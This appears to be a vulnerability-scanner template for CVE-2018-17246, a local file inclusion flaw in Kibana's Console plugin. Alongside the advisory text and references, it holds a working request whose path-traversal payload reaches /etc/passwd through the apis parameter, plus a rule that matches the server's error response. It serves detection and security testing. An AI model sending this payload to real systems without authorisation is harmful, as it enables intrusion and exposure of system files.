Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
PoC代码[已公开]
id: CVE-2018-17246
info:
name: Kibana Local File Inclusion
author: canc3s
severity: high
verified: true
description: |-
Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
- https://www.exploit-db.com/exploits/46233
tags: cve,cve2018,kibana,lfi
created: 2023/08/10
rules:
r0:
request:
method: GET
path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
expression: response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\""))
expression: r0()